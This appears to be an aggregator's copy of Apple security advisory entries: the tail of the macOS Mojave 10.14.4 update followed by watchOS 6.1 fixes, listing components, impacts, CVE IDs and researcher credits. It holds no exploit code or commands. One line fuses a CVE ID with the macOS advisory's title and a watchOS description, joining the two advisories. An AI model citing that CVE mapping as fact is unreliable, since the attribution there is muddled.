CVE-2019-8569: Viktor Oreshkin (@stek29)

Entry added August 1, 2019

**TrueTypeScaler**

Available for: macOS Mojave 10.14.3

Impact: Processing a maliciously crafted font may result in the disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2019-8517: riusksk of VulWar Corp working with Trend Micro Zero Day Initiative

**Wi-Fi**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: An attacker in a privileged network position can modify driver state

Description: A logic issue was addressed with improved validation.

CVE-2019-8564: Hugues Anguelkov during an internship at Quarkslab

Entry added April 15, 2019

**Wi-Fi**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: An attacker in a privileged network position can modify driver state

Description: A logic issue was addressed with improved state management.

CVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt

Entry added August 1, 2019

**Wi-Fi**

Available for: macOS Mojave 10.14.3

Impact: A device may be passively tracked by its Wi-Fi MAC address

Description: A user privacy issue was addressed by removing the broadcast MAC address.

CVE-2019-8567: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt

Entry added August 1, 2019

**xar**

Available for: macOS Mojave 10.14.3

Impact: Processing a maliciously crafted package may lead to arbitrary code execution

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2019-6238: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added April 15, 2019

**XPC**

Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to overwrite arbitrary files

Description: This issue was addressed with improved checks.

CVE-2019-8530: CodeColorist of Ant-Financial LightYear Labs

CVE-2019-8550: About the security content of macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra

A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting.

Released October 29, 2019

**Accounts**

Available for: Apple Watch Series 1 and later

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at Technische Universität Darmstadt

**AirDrop**

Available for: Apple Watch Series 1 and later

Impact: AirDrop transfers may be unexpectedly accepted while in Everyone mode

Description: A logic issue was addressed with improved validation.

CVE-2019-8796: Allison Husain of UC Berkeley

Entry updated April 4, 2020

**App Store**

Available for: Apple Watch Series 1 and later

Impact: A local attacker may be able to login to the account of a previously logged in user without valid credentials.

Description: An authentication issue was addressed with improved state management.

CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu)

**AppleFirmwareUpdateKext**

Available for: Apple Watch Series 1 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8747: Mohamed Ghannam (@\_simo36)

**Audio**

Available for: Apple Watch Series 1 and later

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8785: Ian Beer of Google Project Zero

CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure

**Contacts**

Available for: Apple Watch Series 1 and later

Impact: Processing a maliciously contact may lead to UI spoofing

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)

**File System Events**

Available for: Apple Watch Series 1 and later

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero Day Initiative

**Kernel**

Available for: Apple Watch Series 1 and later

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure

**Kernel**

Available for: Apple Watch Series 1 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8786: Wen Xu of Georgia Tech, Microsoft Offensive Security Research Intern

Entry updated November 18, 2019

**Kernel**

Available for: Apple Watch Series 1 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8829: Jann Horn of Google Project Zero

Entry added November 8, 2019

**libxslt**

Available for: Apple Watch Series 1 and later

Impact: Multiple issues in libxslt

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8750: found by OSS-Fuzz

**VoiceOver**

Available for: Apple Watch Series 1 and later

Impact: A person with physical access to an iOS device may be able to access contacts from the lock screen

Description: The issue was addressed by restricting options offered on a locked device.

CVE-2019-8775: videosdebarraquito

**WebKit**

Available for: Apple Watch Series 1 and later

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8764: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple Watch Series 1 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group

CVE-2019-8765: Samuel Groß of Google Project Zero

CVE-2019-8766: found by OSS-Fuzz

CVE-2019-8808: found by OSS-Fuzz

CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech

CVE-2019-8812: JunDong Xie of Ant-financial Light-Year Security Lab

CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech

CVE-2019-8820: Samuel Groß of Google Project Zero

Entry updated November 18, 2019

Tag

#google